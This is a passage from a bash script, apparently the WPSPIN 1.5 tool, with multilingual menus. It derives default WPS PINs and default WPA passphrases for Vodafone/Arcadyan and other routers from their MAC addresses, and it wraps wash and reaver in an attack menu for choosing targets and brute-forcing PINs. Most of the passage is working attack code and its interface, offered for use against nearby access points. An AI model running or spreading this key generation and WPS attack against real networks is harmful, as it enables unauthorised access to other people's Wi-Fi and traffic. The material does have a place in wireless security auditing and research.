  2095.     INDICEBADM6=$( cat "$DIRECTORY/$WPCNAME" | grep -n -E "$FAKEM6" | awk -F':' '{ print $1 }' | tr -d ':' | tac | awk NR==1 )
  2096.     NEWLINE=`expr $INDICEBADM6 '-' 10005`
  2097.     echo "$NEWHEAD1
  2098. $NEWLINE
  2099. $NEWHEAD3" > "$DIRECTORY/BACKUPfakeM6_$WPCNAME"
  2100.     cat "$DIRECTORY/$WPCNAME" | tail -n +4 >> "$DIRECTORY/BACKUPfakeM6_$WPCNAME"
  2101.  
  2102.    FAKEM6WARNING # REDACTED ACORDING LANGUAGE
  2103.  
  2104. unset NEWLINE && unset INDICEBADM6 && unset FAKEM6
  2105.  
  2106.   fi
  2107.  
  2108.  
  2109.  
  2110. rm attack.txt &> /dev/null                            # We delete the log of the attack
  2111. }
  2112.  
  2113.  
  2114.  
  2115. ARCADYAN(){
  2116. # This function uses three amazing works
  2117. #   1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc
  2118. #   2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
  2119. #   3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
  2120. #
  2121. # Thanks to the three of them for their dedication and passion and for deleivering full disclosure and free code
  2122. # This function is based on the script easybox_keygen.sh previously mentioned
  2123. # # The quotation from the original work start with double dash and are beetwen quotes
  2124. # Some variables and line are changed for a better integration and I add the PIN calculation and Coeamn trick for default WPA  
  2125. # the lines quoted with six dash and "unchanged"  are exactly the same than in easybox_keygen  like this "######unchanged"
  2126.  
  2127.  
  2128. # This function requires $BSSID which is the mac adress ( hex may format XX:XX:XX:XX:XX:XX)
  2129. # It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digit of our PIN, ready to use in CHECKSUM to
  2130. # give the full WPS PIN ($PIN)
  2131.  
  2132. ## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
  2133. deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # supression of $take5 and $last4 compared with esaybox code, the job is directly done in the array value assignation, also the variable $MAC has been replaced by $BSSID taht is used in WPSPIN
  2134. ## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
  2135. hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged
  2136. ## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
  2137. ## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
  2138. c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})  ######unchanged
  2139. c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})  ######unchanged
  2140. K1=$((($c1)%16))  ######unchanged
  2141. K2=$((($c2)%16))  ######unchanged
  2142. X1=$((K1^${deci[3]}))  ######unchanged
  2143. X2=$((K1^${deci[2]}))  ######unchanged
  2144. X3=$((K1^${deci[1]}))  ######unchanged
  2145. Y1=$((K2^0x${hexi[1]}))  ######unchanged
  2146. Y2=$((K2^0x${hexi[2]}))  ######unchanged
  2147. Y3=$((K2^0x${hexi[3]}))  ######unchanged
  2148. Z1=$((0x${hexi[2]}^${deci[3]}))  ######unchanged
  2149. Z2=$((0x${hexi[3]}^${deci[2]}))  ######unchanged
  2150. Z3=$((K1^K2))  ######unchanged
  2151. STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # this to genrate later our PIN, the 7 first digit  
  2152. DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change respected to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on spanish vodafone where he found out that no 0 where used in the final pass
  2153. DEFAULTSSID=$(echo "Vodafone-`echo "$BSSID" | cut -d ':' -f5,6 | tr -d ':' | tr 0 G`")  # the modification of the algorithm in this line is also a contribution of lampiweb forum, for default ssid if there should be a zero it is replaced by G
  2154. }
  2155.  
  2156.  
  2157.  
  2158.  
  2159.  
  2160.  
  2161.  
  2162.  
  2163.  
  2164. #############################################################################################################################################################################
  2165. ######################################################
  2166. #####################################################                  SCRIPT START
  2167. #####################################################
  2168. ####################################################  FIRST START WITH LANGUAGE SELECTION, WE WILL DEFINE THE OUTPUT ACCORDING TO THIS SELECTION#########################
  2169. ######################################################
  2170.  
  2171. SELECTIONLANGUE=0                                  # The script start with a menu to select language, default value is 0 for the variable that set the selection
  2172.  
  2173. while [ $SELECTIONLANGUE -eq 0 ]; do               # while this value is equal to zero
  2174.  
  2175. echo -e "
  2176.       .$amarillo'(     /$rojo·-.  $amarillo  )(.$rojo--.  $amarillo   /$rojo·-.  .$amarillo'(   )\  )\  $rojo
  2177.   ,') \  )  ,' _  \  (   ._.'  ,' _  \ \  ) (  \, / $colorbase     coded by$blanco kcdtv $rojo  
  2178.  (  /(/ /  (  '-' (   ·-. .   (  '-' ( ) (   ) \ (   $colorbase featuring  $blanco antares_145$rojo
  2179.   )    (    ) ,._.'  ,_ (  \   ) ,._.' \  ) ( ( \ \    $blanco r00tnull$colorbase -$blanco 1camaron1$rojo
  2180.  (  .'\ \  (  '     (  '.)  ) (  '      ) \  ·.)/  )    $blanco Coeman76$colorbase -$blanco Spawn$rojo  
  2181. $amarillo   )/   )/   )/   $rojo    '._,_.' $amarillo  )/        )/  $rojo   '$amarillo.( $colorbase  and the$blanco lampiweb team $colorbase"
  2182. echo ""
  2183. echo ""
  2184. echo -e "    $amarillo www.crack-wifi.com     www.lampiweb.com    www.auditoriaswireless.net$colorbase
  2185. "
  2186. echo -e "                                                        "
  2187. echo -e " $magenta      _   ''   $rojo  _ () _      $amarillo                _ _ _                      
  2188. $magenta     [|)efault$rojo  ||)[][|\|$magenta  generator  with$amarillo   \\/\/||)S $magenta attack  interface
  2189.   $rojo              L|          $amarillo                     L|  $magenta  ''                   "
  2190. echo "
  2191. "
  2192. echo -e "$colorbase                          $REALORANGE WPSPIN VERSION 1.5$colorbase for Linux, GPLv3"
  2193. echo -e "$colorbase   Support for more than 30 models and 100's bssid from main manufacturers$magenta
  2194. $blanco TP-Link Belkin$magenta Huawei$blanco Conceptronic$magenta D-Link Samsung$blanco Zyxel$magenta ZTE$blanco Bewan$colorbase and more..."
  2195. echo -e "      including$magenta$colorbase algorithms by$magenta Zhao Chunsheng$blanco S.Wottan$magenta Coeman76$blanco S.Viehböck $colorbase"
  2196. echo -e "designed for$magenta reaverwps$colorbase ($blanco Craig Heffner$colorbase) and$magenta Kali linux$colorbase (details in README.txt)"
  2197. echo -e "
  2198.  
  2199. $rojo
  2200.                             ||  $rojo    _         ____ ''
  2201.                             L_]angu//\ge  selecL|   $colorbase
  2202.  
  2203. "
  2204.                # while this value is equal to zero  
  2205. echo -e "                         +---------------------------+     "
  2206. echo -e "                         |   $blanco  1$colorbase  -$amarillo  ENGLISH   $colorbase      |     "
  2207. echo -e "                         |   $blanco  2$colorbase  -$amarillo  ESPANOL   $colorbase      |     "
  2208. echo -e "                         |   $blanco  3$colorbase  -$amarillo  FRANCAIS  $colorbase      |     "
  2209. echo -e "                         +---------------------------+     "
  2210. echo -e " "
  2211. echo -e "$rojo"
  2212. read -ep "                                       " SELECT
  2213. echo -e "$colorbase"
  2214.  if [[ $SELECT == "1" ]]; then                     # if this value is 1
  2215.   SELECTIONLANGUE=1                                # then the selected language will be 1, English
  2216.    elif [[ $SELECT == "2" ]]; then            
  2217.    SELECTIONLANGUE=2                               # 2 will be Spanish
  2218.      elif [[ $SELECT == "3" ]]; then
  2219.      SELECTIONLANGUE=3                             # 3 will be French
  2220.        else                                        # anything else will keep the variable with a value of 0 and bring us back to the beginning of the while loop
  2221.        SELECTIONLANGUE=0                           # where the user has to enter his choice for the language
  2222.  fi
  2223. done  
  2224.  
  2225.  
  2226. ################################################ WE DEFINE THE FUNCTIONS AND VARIABLES THAT CHANGES WITH LANGUAGE #######################################################
  2227. #################################################################
  2228. ###########################################   THE FUNCTIONS ARE >>>>>>>
  2229. ################################################### 1 - OUTPUT  > gives model router, default PIN and other elements about target AP   ###############################
  2230. ################################################### 2 - DATASGENERADOR > the user will enter bssid and essid for the generator mode ####################################3
  2231. ################################################### 3 - SHORT MENUE > If the user does not have mode monitor he will be limited in his options in short menu
  2232. ################################################### 4 - SELECT_THEIFACE > prompt the user which is his/her choice
  2233. ################################################### 5 - WASH_DISPLAY > prompt the user which is his/her choice
  2234. ################################################### 6 - BIG_MENUE_DISPLAY > Shows the options of the big menu
  2235. ################################################### 7 - CIAO > you say goodbye, and i say hello, hello hello.
  2236. ################################################### 8 - ATTACK_MENUE_DISPLAY > Shows the options of attack menu
  2237. ################################################### 9 - CUSTOMPIN > allow the user to enter manually a PIN for attack
  2238. ################################################### 10 - SECATOR > allow the user to enter a sequence of selected PIN
  2239. ################################################### 11 - SUMUPNOM6 > Show the progress made in a wpc session without M6
  2240. ################################################### 12 - SUMUPM6 > Show the progress when we got the M6
  2241. ################################################### 13 - PINFOUND > displayed if the pin has been found
  2242. ################################################### 14 - FAILEDREAVER > Warning in case of "Failed to initialize interface" with reaver
  2243. ################################################### 15 - CUSTOMREAVER > the user will be prompt to enter aditional arguments for reaver attack
  2244.  
  2245. ##########################################    THE VARIABLES ARE >>>>>>>
  2246. ##################################################  1 . MON_ADVERTENCIA > If the unique chipset is unknown by airmon-ng
  2247. #################################################   2 - INTERFACEDESIGN > the top of menu to select interface
  2248. #################################################   3 - WASHWAIT > warn the user that the scan with wash is taking place
  2249. #################################################   4 - NO_MONITOR_MODE > That will define "WARNING" in the short menu (no mode monitor available, no reaver installed,no wash
  2250. #################################################   5 - NO_REAVER > if there is no wps reaver  installed
  2251. #################################################   6 - FAILED > When the wpa passphrase hasn't been recovered
  2252. #################################################   7 - KEY_FOUND > When reaver finds the key
  2253. #################################################   8 - STOP_REAVER > shows to the user that he can stop the attack by pressing CTRL+C
  2254. #################################################   9 - AIRMON_WARNING > chipset is not fully supported
  2255. #################################################  10 - ROOT_ADVERTENCIA > The user is not root, short menu is forced
  2256. #################################################  11 - DIRECTORY_ADVERTENCIA > WPSPIN need it directory, to ensure the correct location
  2257. #################################################  12 - FAKE M4 WARNING > suspicious M4 is detected, user is warn
  2258. #################################################  13 - FAKE M6 WARNING > the same with M8
  2259.  
  2260.  
  2261.  
  2262. #############################################################################################
  2263. if [ "$SELECTIONLANGUE" == 1 ]; then  ############################### 1 > ENGLISH LANGUAGE #################################################################################
  2264.  
  2265.  
  2266.  
  2267.  
  2268.  
  2269. OUTPUT(){
  2270.  
  2271.  
  2272.  
  2273. echo -e "$colorbase"
  2274. echo "+------------------------------------------------------------------------------+"
  2275. echo -e "|          $violet                  DEVICE INFORMATION          $colorbase                      |"
  2276. echo "+------------------------------------------------------------------------------+"
  2277.  
  2278. if [ -n "${FABRICANTE}" ]; then
  2279.      DISPLAYFABRICANTE=$( echo "$FABRICANTE                                                              " | cut -b -61 )
  2280.    echo -e "| Manufacturer :$amarillo $DISPLAYFABRICANTE $colorbase|"
  2281. fi
  2282.  
  2283. if [ -n "${DEFAULTSSID}" ]; then
  2284.     DISPLAYDEFAULTSSID=$( echo "$DEFAULTSSID                                                              " | cut -b -61 )
  2285.    echo -e "| Default SSID :$amarillo $DISPLAYDEFAULTSSID $colorbase|"
  2286. fi
  2287.  
  2288. if [ -n "${MODEL}" ]; then
  2289. DISPLAYMODEL=$( echo "$MODEL                                                              " | cut -b -61 )
  2290. echo -e "| Model        :$amarillo $DISPLAYMODEL $colorbase|"
  2291. fi
  2292.  
  2293.  unset DISPLAYFABRICANTE && unset DISPLAYDEFAULTSSID && unset DISPLAYMODEL
  2294.  
  2295.  
  2296.   if [ "$UNKNOWN" -eq "0"  ];
  2297.     then
  2298.  
  2299.      echo "+------------------------------------------------------------------------------+"
  2300.      echo -e "|           $violet                      ABOUT WPS          $colorbase                          |"
  2301.      echo "+------------------------------------------------------------------------------+"
  2302.  
  2303.        if [ "$ACTIVATED" -eq "1" ] ;
  2304.         then
  2305.           echo -e "|     $verdefluo              WPS ENABLED WITH DEFAULT SETTINGS     $colorbase                     |"
  2306.           echo "+------------------------------------------------------------------------------+"
  2307.        else
  2308.           echo -e "|      $rojo              WPS DISABLED WITH DEFAULT SETTINGS     $colorbase                   |"
  2309.           echo "+------------------------------------------------------------------------------+"  
  2310.        fi
  2311.  
  2312.       if  [ "$APRATE" -eq "0" ] ;
  2313.         then
  2314.         echo -e "|              $verdefluo     NO AP RATE LIMIT DEFENSE MECHANISM    $colorbase                     |"  
  2315.         echo "+------------------------------------------------------------------------------+"
  2316.       else
  2317.         echo -e "|          $rojo         BE AWARE : AP RATE LIMIT IS ENABLED !      $colorbase                |"
  2318.         echo "+------------------------------------------------------------------------------+"
  2319.       fi
  2320.  
  2321.       if  [ "$SPECIAL" -eq "1" ] ;
  2322.         then
  2323.         echo -e "|    $rojo    CHECK TARGET MODEL, DIFFERENT DEVICES SHARE THIS BSSID RANK $colorbase          |"
  2324.         echo "+------------------------------------------------------------------------------+"
  2325.       fi
  2326.   DISPLAYPIN=$( echo "$PIN $PIN1 $PIN2 $PIN3 $PIN4 $PIN5 $PIN6 $PIN7 $PIN8                                                                   " | cut -b -78 )        
  2327.  
  2328. echo "+------------------------------------------------------------------------------+"
  2329. echo -e "| $violet                           DEFAULT(s) PIN(s)    $colorbase                             |"    
  2330. echo -e "|$amarillo$DISPLAYPIN$colorbase|"
  2331. echo "+------------------------------------------------------------------------------+"
  2332.  elif [ "$UNKNOWN" -eq "1"  ]; then
  2333.  
  2334.     echo "+------------------------------------------------------------------------------+"
  2335.     echo -e "|          $orange             UNKNOWN or UNSUPPORTED DEVICE   $colorbase                       |"
  2336.     echo "|                                                                              |"
  2337.     echo "+------------------------------------------------------------------------------+"
  2338.     echo -e "|                        $orange POSSIBLE PIN :$amarillo $PIN        $colorbase                      |"
  2339.     echo "+------------------------------------------------------------------------------+"
  2340.  
  2341.  else
  2342.     echo "+------------------------------------------------------------------------------+"
  2343.     echo -e "|          $rojo                   UNSUPPORTED DEVICE   $colorbase                            |"
  2344.     echo "|                                                                              |"
  2345.     echo "+------------------------------------------------------------------------------+"
  2346.  
  2347.  fi
  2348.  
  2349. if [ -n "${DEFAULTWPA}" ]; then
  2350. DEFAULTWPADISPLAY=$(echo "$DEFAULTWPA                                                                           " | cut -c -78)
  2351.  echo -e "|  $violet                        DEFAULT WPA PASSPHRASE   $colorbase                           |"
  2352.  echo -e "|$verdefluo$DEFAULTWPADISPLAY$colorbase|"
  2353.  echo "+------------------------------------------------------------------------------+"
  2354. fi
  2355. }
  2356.  
  2357.  
  2358.  
  2359. DATASGENERADOR(){
  2360. echo -e "$colorbase"
  2361. echo -e "                    -------------------------------------"
  2362. echo ""
  2363. read -ep "                1 > Insert eSSID and press <Enter> : "  ESSID          # essid has a variable                
  2364. echo "  "
  2365. read -ep "                2 > Insert bSSID and press <Enter> : " BSSID           # bssid has variable
  2366. echo "  "
  2367. while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
  2368. do                                                                           # fast and smart filter for conformity bssid with loop over conditions... gracias antares XD
  2369. echo -e " $rojo Error : MAC No Conform $colorbase"
  2370. echo "  "
  2371. read -ep "                2 > Insert bSSID and press <Enter> : " BSSID
  2372. echo "  "            
  2373. done
  2374. }
  2375.  
  2376.  
  2377. SHORTMENUE(){                                                 # Reduced menu inside which the user will be blocked  if no monitor interface is possible, no scan, no attack
  2378.  
  2379.  
  2380.  
  2381. echo "$SORTMENUE_WARNING"
  2382. echo ""
  2383. echo -e "$colorbase"
  2384. echo -e "                              $orange       ¿   $negro  ?           "
  2385. echo -e "                            $verde    ?   $azul    ?      $colorbase        "
  2386. echo -e "                        $blanco       ¿ $colorbase  >X<  $gris  ¿         $colorbase "    
  2387. echo -e "                               -  (O o)  -         "
  2388. echo -e "                    +---------ooO--(_)--Ooo-------------+   "
  2389. echo -e "                    |                                   |   "
  2390. echo -e "                    | $blanco   1$colorbase -$amarillo  GENERATE PIN$colorbase              |   "
  2391. echo -e "                    | $blanco   2$colorbase -$amarillo  RELOAD INTERFACES CHECK$colorbase   |   "
  2392. echo -e "                    | $blanco   3$colorbase -$amarillo  EXIT WPSPIN$colorbase               |   "
  2393. echo -e "                    |                                   |   "
  2394. echo -e "                    +-----------------------------------+   "
  2395. echo -e ""
  2396. echo ""
  2397. echo ""
  2398. echo -e "                              Your choice : $rojo"
  2399. echo ""  
  2400. read -ep  "                                      " SHORTMENUE_CHOICE                
  2401. echo -e "$colorbase"                  
  2402.  
  2403. if [ "$SHORTMENUE_CHOICE" == "1" ] ; then
  2404.  
  2405.     DATASGENERADOR
  2406.     GENERATE
  2407.     OUTPUT
  2408. unset PIN2 && unset PIN3 && unset PIN4 && unset PIN5 && unset PIN6 && unset PIN7 && unset PIN8 && unset  FABRICANTE  && unset DEFAULTSSID   && unset MODEL
  2409.  
  2410. echo -e " "
  2411. echo -e "      ...$verdefluo  press <enter> to continue $colorbase..."    # pause to let the user copy the given data
  2412. read -ep "" NIENTE
  2413.  
  2414.    SHORTMENUE  
  2415.  
  2416. elif [ "$SHORTMENUE_CHOICE" == "2" ] ; then
  2417.  
  2418.     IFACE
  2419.  
  2420. elif [ "$SHORTMENUE_CHOICE" == "3" ]; then
  2421.  
  2422. CLEAN
  2423. CIAO
  2424.  
  2425. exit 0
  2426.  
  2427. else
  2428.  
  2429. echo -e " ................$rojo  incorrect option $colorbase........"
  2430.  
  2431.  SHORTMENUE
  2432.    
  2433.  
  2434. fi
  2435.  
  2436. }
  2437.  
  2438.  
  2439.  
  2440.  
  2441. SELECT_THEIFACE (){
  2442. read -ep "                           Select interface : " i        # ask the user to choose among available interfaces  
  2443. }
  2444.  
  2445.  
  2446. WASH_DISPLAY(){                                    # WE make a break here to be able to just display the results later and because it was confusing for languages
  2447. if [ "$WALSH_O_WASH" == "wash" ]; then
  2448.  
  2449. echo "--------------------------------------------------------------------------------"        # devolvemos el resultado reorganizandolo
  2450. echo -e "  $blanco          BSSID         RSSI  WPS  Locked    PIN    Channel    ESSID  $colorbase"          
  2451. echo "--------------------------------------------------------------------------------"
  2452. echo ""
  2453.  
  2454. else
  2455.  
  2456. echo "--------------------------------------------------------------------------------"        # devolvemos el resultado reorganizandolo
  2457. echo -e "  $blanco           BSSID                 PIN               ESSID  $colorbase"          
  2458. echo "--------------------------------------------------------------------------------"
  2459. echo ""
  2460.  
  2461. fi
  2462.  
  2463. for i in ${!BSSID[*]}; do
  2464.  
  2465.   CHANNEL_CHECK=$(echo ${CHANNEL[${i}]})
  2466.   LOCK_CHECK=$(echo ${LOCKED[${i}]})
  2467.   BSSID=$(echo ${BSSID[${i}]})
  2468.   ESSID=$(echo ${ESSID[${i}]})
  2469.  
  2470.   GENERATE
  2471.  
  2472.   if [ "$WALSH_O_WASH" == "wash" ]; then  
  2473.     if [ "$LOCK_CHECK" = "No" ]; then
  2474.       DISPLAY_LOCKED=$( echo -e "$verde  No$colorbae")
  2475.     else
  2476.       DISPLAY_LOCKED=$( echo -e "$rojo Yes$colorbae")  
  2477.     fi
  2478.     if [ "$CHANNEL_CHECK" -lt 10 ]; then
  2479.       DISPLY_CHANNEL=$( echo " $CHANNEL_CHECK")
  2480.     else
  2481.       DISPLY_CHANNEL=$(echo ${CHANNEL[${i}]})
  2482.     fi  
  2483.   fi
  2484.  
  2485.   if [ "$i" -lt 10 ]; then
  2486.     NUM=$( echo -e " $amarillo$i$colorbase")
  2487.   else
  2488.     NUM=$( echo -e "$amarillo$i$colorbase")
  2489.   fi
  2490.  
  2491.  
  2492.   if [ "$UNKNOWN" = 1 ]; then
  2493.     DISPLAY_PIN=$( echo -e "$orange$PIN$colorbase" )
  2494.   elif [ "$UNKNOWN" = 0 ]; then
  2495.     DISPLAY_PIN=$( echo -e "$verdefluo$PIN$colorbase" )
  2496.   else
  2497.     DISPLAY_PIN=$( echo -e "$rojo UNKNOWN$colorbase" )
  2498.   fi
  2499.  
  2500.    
  2501.   if [ -n "${DEFAULTWPA}" ]; then
  2502.     DISPLAYBSSID=$( echo -e "$azulfluo$BSSID$colorbase")
  2503.   else
  2504.     DISPLAYBSSID=$( echo -e "$blanco$BSSID$colorbase")
  2505.   fi
  2506.   if [ "$WALSH_O_WASH" == "wash" ]; then
  2507.     echo -e " $NUM   $DISPLAYBSSID   ${RSSI[${i}]}   ${WPS[${i}]}  $DISPLAY_LOCKED    $DISPLAY_PIN   $DISPLY_CHANNEL    $blanco$ESSID$colorbase "
  2508.   else
  2509.     echo -e " $NUM    $blanco$BSSID$colorbase         $DISPLAY_PIN        $blanco$ESSID$colorbase  "
  2510.   fi
  2511. done
  2512. echo -e "$colorbase"
  2513. echo "--------------------------------------------------------------------------------"
  2514. echo ""
  2515. CONFORMITY=$(echo ${#BSSID[@]})
  2516. if [ "$CONFORMITY" = 0 ]; then
  2517.  
  2518.   echo -e  "$rojo ERROR -$blanco no target found we will check if wash can properly reach $amarillo$MON_ATTACK$colorbase "
  2519.  
  2520.     if [[ ! `(timeout 4 $WALSH_O_WASH -i $MON_ATTACK -C | grep ERROR )` ]];
  2521.       then
  2522. echo "--------------------------------------------------------------------------------"
  2523.     echo -e "$verdefluo                   wash can properly reach$amarillo $MON_ATTACK$colorbase"
  2524. echo "--------------------------------------------------------------------------------"
  2525.  
  2526. echo -e "$blanco
  2527. - Maybe there is$rojo no WPS$blanco devices around?...
  2528. - Maybe you did not choose the$verdefluo best interface$blanco?
  2529. - Disconnect manually$amarillo every device from the Internet$blanco
  2530. - Check$amarillo permissions$blanco
  2531. - Check$amarillo mounting point$blanco if you have WPSPIN in an$amarillo USB$blanco or$amarillo external HDD$blanco
  2532. (Especially if you use live mode)
  2533. -$kindofviolet Iw scan mode will proposed soon as an alternative$blanco.
  2534. -$blanco We$verdefluo try to fix$blanco this and Send you back to the$kindofviolet interface selection $colorbase
  2535. $blanco(if you have severals devices, you should be prompt to choose one)$blanco
  2536. ... If you still see this message;
  2537.   ... check your wash-reaver installation
  2538. $verdefluo  You can get support and report bugs in$amarillo crack-wifi.com$verdefluo and$amarillo lampiweb.com$verdefluo
  2539. and soon in$amarillo Kali linux forum$colorbase"
  2540.   sleep 5
  2541.   airmon-ng stop $MON_ATTACK &>/dev/null
  2542.   unset MON_ATTACK
  2543.   IFACE
  2544.   BIG_MENUE                      
  2545.   else
  2546. echo "--------------------------------------------------------------------------------"
  2547.     echo -e "                  $rojo wash is not able to reach the interface$colorbase"
  2548. echo "--------------------------------------------------------------------------------"
  2549. echo -e "$blanco
  2550. - Check your$amarillo reaver/wash$blanco installation
  2551. - Check the$amarillo wireless button$blanco if you use a laptop
  2552. - Check your$amarillo USB ports and connections$blanco if you have a USB device
  2553. -$verdefluo we try to fix$blanco this and send you back to the$kindofviolet interface selection menu
  2554. $blanco (if you have several interfaces you should be prompt to choose between them)$colorbase
  2555. "
  2556.   sleep 5
  2557.   if [[ -n `(airmon-ng stop $MON_ATTACK | grep SIOCSIFFLAGS )` ]]; &>/dev/null
  2558.     then
  2559. echo "--------------------------------------------------------------------------------"
  2560. echo -e " $rojo                      RF-Kill is blocking the device
  2561.  
  2562. $verdefluo     Check if your wireless is activated and check your wireless buttons ! $colorbase"
  2563. echo "--------------------------------------------------------------------------------"  
  2564.   sleep 5
  2565.   unset MON_ATTACK
  2566.   IFACE
  2567.   BIG_MENUE
  2568.  fi
  2569. fi  
  2570.  
  2571.      
  2572.   else
  2573. TARGETNUMBER=$( echo -e "$colorbase Introduce target number : $amarillo" )  
  2574. read  -ep "$TARGETNUMBER " i
  2575. echo -e "$colorbase"
  2576.    
  2577.  
  2578.  until [[ $i = *[[:digit:]]* ]] && [[ "$i" -lt "$CONFORMITY" ]]  &&  [[ "$i" -ge 1 ]]   ; do
  2579.    echo -e "     $rojo INVALID CHOICE  $colorbase"
  2580.       echo ""
  2581.       read  -ep "$TARGETNUMBER " i
  2582.       echo -e "$colorbase"
  2583.    done
  2584. fi
  2585. unset PIN2 && unset PIN3 && unset PIN4 && unset PIN5 && unset PIN6 && unset PIN7 && unset PIN8 && unset SPECIAL
  2586.  
  2587. BSSID=$(echo ${BSSID[${i}]})
  2588. ESSIDSUCIO=$(echo ${ESSID[${i}]})
  2589. ESSID="${ESSIDSUCIO%"${ESSIDSUCIO##*[![:space:]]}"}"
  2590. CHANNEL=$(echo ${CHANNEL[${i}]})
  2591.  
  2592. GENERATE
  2593.  
  2594. }
  2595.  
  2596.  
  2597.  
  2598.  
  2599. BIG_MENUE_DISPLAY(){
  2600. echo -e "$colorbase copyleft GPL v.3, support the free software!"
  2601. echo -e "
  2602.        .$amarillo'(     /$rojo·-.  $amarillo  )(.$rojo--.  $amarillo   /$rojo·-.  .$amarillo'(   )\  )\  $rojo
  2603.    ,') \  )  ,' _  \  (   ._.'  ,' _  \ \  ) (  \, / $colorbase     coded by$blanco kcdtv $rojo  
  2604.   (  /(/ /  (  '-' (   ·-. .   (  '-' ( ) (   ) \ (   $colorbase featuring  $blanco antares_145$rojo
  2605.    )    (    ) ,._.'  ,_ (  \   ) ,._.' \  ) ( ( \ \    $blanco r00tnull$colorbase -$blanco 1camaron1$rojo
  2606.   (  .'\ \  (  '     (  '.)  ) (  '      ) \  ·.)/  )    $blanco Coeman76$colorbase -$blanco Spawn$rojo  
  2607. $amarillo   )/   )/   )/   $rojo    '._,_.' $amarillo  )/        )/  $rojo   '$amarillo.( $colorbase  and the$blanco lampiweb team $colorbase"
  2608. echo ""
  2609. echo ""
  2610. echo -e "    $amarillo www.crack-wifi.com     www.lampiweb.com    www.auditoriaswireless.net$colorbase"
  2611.  
  2612. echo ""
  2613. echo ""
  2614. echo -e "                                                        "
  2615. echo -e " $magenta      _   ''   $rojo  _ () _      $amarillo                _ _ _                      
  2616. $magenta     [|)efault$rojo  ||)[][|\|$magenta  generator  with$amarillo   \\/\/||)S $magenta attack  interface
  2617.   $rojo              L|          $amarillo                     L|  $magenta  ''                   "
  2618. echo ""
  2619.  
  2620. echo -e "$rojo
  2621.                         _ _  () _     _ _    
  2622.                        //\/\A[][|\|  //\/\ E[|\|ue '' $colorbase"
  2623. echo "
  2624.  
  2625. "
  2626. echo -e "                +----------------------------------------------+  "
  2627. echo -e "                |                                              |  "
  2628. echo -e "                |  $amarillo   1$colorbase  -$blanco  AUTOMATED MODE (WASH AND REAVER)$colorbase   |  "
  2629. echo -e "                |  $amarillo   2$colorbase  -$blanco  PIN GENERATOR (WITH ATTACK MENU)$colorbase   |  "
  2630. echo -e "                |  $amarillo   3$colorbase  -$blanco  CHANGE INTERFACE$colorbase                   |  "
  2631. echo -e "                |  $amarillo   4$colorbase  -$blanco  RESTART OR CHANGE LANGUAGE$colorbase         |  "
  2632. echo -e "                |  $amarillo   5$colorbase  -$blanco  EXIT$colorbase                               |  "
  2633. echo -e "                |                                              |  "
  2634. echo -e "                +----------------------------------------------+  "
  2635. echo "
  2636. "
  2637. echo -e "                                  Your Choice    "
  2638. echo -e "$rojo"
  2639. read -ep "                                       " BIG_MENUE_CHOICE
  2640. echo -e "$colorbase"
  2641. until [[ $BIG_MENUE_CHOICE = *[[:digit:]]* ]]  &&  [[ "$BIG_MENUE_CHOICE" -gt "0" ]]  && [[ "$BIG_MENUE_CHOICE" -lt "6" ]] ; do
  2642.  BIG_MENUE_DISPLAY
  2643. done
  2644.  
  2645. }
  2646.  
  2647.  
  2648.  
  2649. CIAO(){
  2650.  
  2651. echo ""
  2652. echo -e " $colorbase                      Cheers!
  2653.                              See you in$amarillo crack-wifi.com $colorbase
  2654.                        $rojo  | $amarillo lampiweb.com$colorbase and$amarillo auditoriaswireless.net$colorbase  "
  2655. echo -e "                $rojo          |.===.       "
  2656. echo -e "                     $colorbase  - $rojo {}$violet° 0$rojo{} $colorbase -         "          
  2657. echo -e "----------------------$blanco ooO$colorbase--$blanco(_)$colorbase-$blanco Ooo$colorbase--------------------------------------------"
  2658. exit 0
  2659. }
  2660.  
  2661.  
  2662.  
  2663. ATTACK_MENUE_DISPLAY(){
  2664. echo -e "    $colorbase              "
  2665. echo -e "              Target > $blanco$ESSID $colorbase mac > $blanco$BSSID $colorbase"
  2666. echo -e "              +----------------------------------------------------+  "
  2667. echo -e "              |$blanco   1 $colorbase -$amarillo ATTACK WITH REAVER AND PIN $rojo$PIN$colorbase         |  "
  2668. echo -e "              |$blanco   2 $colorbase -$amarillo MANUALLY ENTER A PIN FOR ATTACK$colorbase             |  "
  2669. echo -e "              |$blanco   3 $colorbase -$amarillo SELECT A RANGE OF PIN TO TRY FIRST$colorbase          |  "
  2670. echo -e "              |$blanco   4 $colorbase -$amarillo CUSTOMIZE REAVER ATTACK$colorbase                     |  "
  2671. echo -e "              |$blanco   5 $colorbase -$verdefluo SELECT ANOTHER TARGET$colorbase                       |  "
  2672. echo -e "              |$blanco   6 $colorbase <$azulfluo GO BACK$blanco /$amarillo RESCAN$colorbase +$amarillo CHANGE INTERFACE   $colorbase      |  "
  2673. echo -e "              |$blanco   7 $colorbase -$azulfluo RESTART$blanco /$amarillo CHANGE LANGUAGE$colorbase                   |  "
  2674. echo -e "              |$blanco   8 $colorbase -$rojo EXIT $colorbase                                       |  "
  2675. echo -e "              +----------------------------------------------------+  "
  2676. echo ""
